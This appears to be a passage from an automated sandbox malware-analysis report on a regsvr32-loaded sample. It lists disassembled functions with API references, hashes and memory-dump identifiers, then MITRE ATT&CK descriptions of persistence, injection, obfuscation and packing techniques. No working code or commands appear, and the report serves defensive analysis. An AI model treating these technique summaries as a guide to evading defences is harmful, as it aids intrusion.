_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D08774
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0877A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D08780

Strings

890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f, xrefs: 00007FF983D0859D

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
String ID: 890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f
API String ID: 469901203-4124513118
Opcode ID: 3602cfd0d42010217e373dacb309e58bce7e78d8b1765175df8e9e158eb95b46
Instruction ID: 9c8486367b2f6a695caffc4f1dcd33ac69dfd4566782d074f961af5316e5ff81
Opcode Fuzzy Hash: 3602cfd0d42010217e373dacb309e58bce7e78d8b1765175df8e9e158eb95b46
Instruction Fuzzy Hash: E751F9A2B14681A8EB00DFB5D0507EC2761FB45B98F888135DA1EA7BDADE78F149C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D08790, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161UNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983D1B580: WideCharToMultiByte.KERNEL32 ref: 00007FF983D1B5F8
Part of subcall function 00007FF983D1B580: WideCharToMultiByte.KERNEL32 ref: 00007FF983D1B6AF

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D089B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D089BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D089C0

Strings

1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106, xrefs: 00007FF983D087DD

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
String ID: 1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106
API String ID: 469901203-501322296
Opcode ID: 569b2215dfc5715a82d41289f70e8fdd74dfa9d9afdc4ca22f6335679392d67c
Instruction ID: 78ade171f4ed180716ce92f82520f3f5432cb8b9e857cc45207ba37d6b09d77b
Opcode Fuzzy Hash: 569b2215dfc5715a82d41289f70e8fdd74dfa9d9afdc4ca22f6335679392d67c
Instruction Fuzzy Hash: 9951FBD2B1568198EB00DFB5D0507EC2761FB44B98F888135DA5EA7BDADE78F149C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D2EC3C, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D2EC76
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D2EE4B

Strings

*, xrefs: 00007FF983D2ED74
, xrefs: 00007FF983D2EDC9

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
Instruction ID: 738b9c882d75971694be9ab4397b5d72d34b45aa40961c7bfd578a340ecc5f13
Opcode Fuzzy Hash: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
Instruction Fuzzy Hash: 2D6187B290C25286E768CF6A805467C7BA5FB05B04F9C113DD64FA3299DFA9F849D700

Uniqueness

Uniqueness Score: 0.98%

Function 00007FF983D012DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109UNIQUE

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 00007FF983D012FD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0148A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D01490

Strings

d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D0131D

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$InfoNativeSystem
String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
API String ID: 836507568-2598894011
Opcode ID: cb92bb46cebca72f8651a21447b93ae4e746fe33eb5e49174483c909dc6c2128
Instruction ID: f34521d508e3b8faa9adf15c60e082a9250a9f565d018dc319cde271fec662a0
Opcode Fuzzy Hash: cb92bb46cebca72f8651a21447b93ae4e746fe33eb5e49174483c909dc6c2128
Instruction Fuzzy Hash: 7441A5A2B1878181EA10DB69E09475D6351FB857E0F945239EB9D93BE9DFBCF088C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D4C0E0, Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4C121
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4C1A1
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D4C1F5
_get_daylight.LIBCMT ref: 00007FF983D4C24D

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
Instruction ID: 7848fff868e7244c4dd88e6e99e6157614a4e5a019d649a4dd4335b838a2f5e8
Opcode Fuzzy Hash: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
Instruction Fuzzy Hash: 8951B1B2E0860296F768C9E89440B797540BB40714F9D443DDA0FF72E6DAECB94AD641

Uniqueness

Uniqueness Score: 1.44%

Function 00007FF983D43874, Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00007FF983D438C2
GetLastError.KERNEL32 ref: 00007FF983D438CC
SetFilePointerEx.KERNEL32 ref: 00007FF983D438F0
SetFilePointerEx.KERNEL32 ref: 00007FF983D43915

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
Instruction ID: e84d8a4085f905f8aa69d89249519c73ca0063f2096425dbab20d0d7d3c3b84a
Opcode Fuzzy Hash: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
Instruction Fuzzy Hash: 3C21BBA3A08A4281DB10DB65A801B69B351BB84BA0FDC0335D56FE7AD4DEBCF459C740

Uniqueness

Uniqueness Score: 0.24%

Function 00007FF983D2CA5C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163UNIQUELIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF983D2CA86

Strings

csm, xrefs: 00007FF983D2CAAB
csm, xrefs: 00007FF983D2CC1A

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
Instruction ID: da66dde18b83057f5386aa42f67c610220cfe3737137225ab1b64b209afd96d6
Opcode Fuzzy Hash: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
Instruction Fuzzy Hash: 0B71D5B250868186D761CF66D040B797BA0FB40F85F888139EA4EA7B85CF7CF996D700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D426F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D42733

Strings

e+000, xrefs: 00007FF983D427D8
gfff, xrefs: 00007FF983D42855

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
Instruction ID: 205b44d89cd97ceee395f481e109ac40f9fd7b2d708ab18705182d10acfc7fda
Opcode Fuzzy Hash: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
Instruction Fuzzy Hash: 835147A2B186C186E724CF75994176D6B91FB80B90F8C9239C79D97BD5CEACF448C700

Uniqueness

Uniqueness Score: 1.11%

Function 00007FF983D47B44, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_handle_errorf.LIBCMT ref: 00007FF983D47CB6

Strings

powf, xrefs: 00007FF983D47CAF
", xrefs: 00007FF983D47C61

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _handle_errorf
String ID: "$powf
API String ID: 2315412904-603753351
Opcode ID: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
Instruction ID: 105d9609fc8878d5a6c176a0b24cea667ddbc48c42e4ada3d0dedf250708b68a
Opcode Fuzzy Hash: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
Instruction Fuzzy Hash: A84195B3D28680CBE370CF62E480BA9B7A0F799348F141329F74A56998CBBDD554DB00

Uniqueness

Uniqueness Score: 3.53%

Function 00007FF983D08440, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0853F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D08545

Strings

>> , xrefs: 00007FF983D08446

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: >>
API String ID: 3668304517-2870946365
Opcode ID: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
Instruction ID: ee01a0b2bf94d6f600e05fd24200f5b2f2056d0130219c130d0071202a37a087
Opcode Fuzzy Hash: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
Instruction Fuzzy Hash: 74216FA2A0468191EA04DBA5D09876D33A2FB44FC8F988039D74E97659DFBCF4A4C344

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D47A20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF983D47B32

Strings

", xrefs: 00007FF983D47B0B
pow, xrefs: 00007FF983D47B21

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
Instruction ID: f2caa1dbae5c0fe55843c19cb52215b3441a5fbe045e0728a9da34a9e7a70aae
Opcode Fuzzy Hash: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
Instruction Fuzzy Hash: 1E3184B2D1CAC586D770CF50E040B6BB6A0FBDA384F141329F68A5A954DBFDE185DB00

Uniqueness

Uniqueness Score: 1.47%

Function 00007FF983D46408, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983D46441
CompareStringW.KERNEL32 ref: 00007FF983D464C9

Strings

CompareStringEx, xrefs: 00007FF983D46435

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
Instruction ID: 0c31ce2bc8bf824b5ad2afc42d52669391f5fc5893507759926f52c7fbf2ae4a
Opcode Fuzzy Hash: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
Instruction Fuzzy Hash: 89113076608B8186D760CB55B44079AB7A0FBC9B90F58413AEECE93B19DF7CE548CB40

Uniqueness

Uniqueness Score: 5.06%

Function 00007FF983D46674, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983D466AD
LCMapStringW.KERNEL32 ref: 00007FF983D46735

Strings

LCMapStringEx, xrefs: 00007FF983D466A1

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
Instruction ID: 38b518ded94524d56f6c33315c135fcc47a6494e1336907928d78d0f10bf6b4e
Opcode Fuzzy Hash: 4ede907a2e89eb3f1f65562d7df3e5d129746184517bbdd29761990bad3bc2f0
Instruction Fuzzy Hash: A0113E76608B8186D760CB45B4407AAB7A1FB88B90F58413AEE8E93F59CF7CE444CB40

Uniqueness

Uniqueness Score: 3.32%

Function 00007FF983D46610, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983D46641
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF983D4665B

Strings

InitializeCriticalSectionEx, xrefs: 00007FF983D46635

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
Instruction ID: a5f2f8a252689b159321e4e4e1271f25089d7c8297708fcdad3f6874d157473d
Opcode Fuzzy Hash: 7fbae409679859a71c58585c3126cb322e235c233146637da39d6228bd56cb13
Instruction Fuzzy Hash: 29F03AA2E18A8182EB14DB95B540AA562A1BF48B80F8C4039EA5F63B55CEACF45DC740

Uniqueness

Uniqueness Score: 2.28%

Function 00007FF983D465BC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983D465E5
TlsSetValue.KERNEL32 ref: 00007FF983D465FC

Strings

FlsSetValue, xrefs: 00007FF983D465D2

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
Instruction ID: f3a70e5dd97ba38dc53d92df6a945d51c946fe5c322a7f3b2b2608ecfe5abd30
Opcode Fuzzy Hash: 0a693a1abd842adf0613c275b2fa7a1b6d1c31aab5dff857b20875aa701a0f86
Instruction Fuzzy Hash: 19E030E2A0864291EB05CB90A800AB52262BF48780FCC403AD51F96A95CEADF49DC610

Uniqueness

Uniqueness Score: 1.69%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

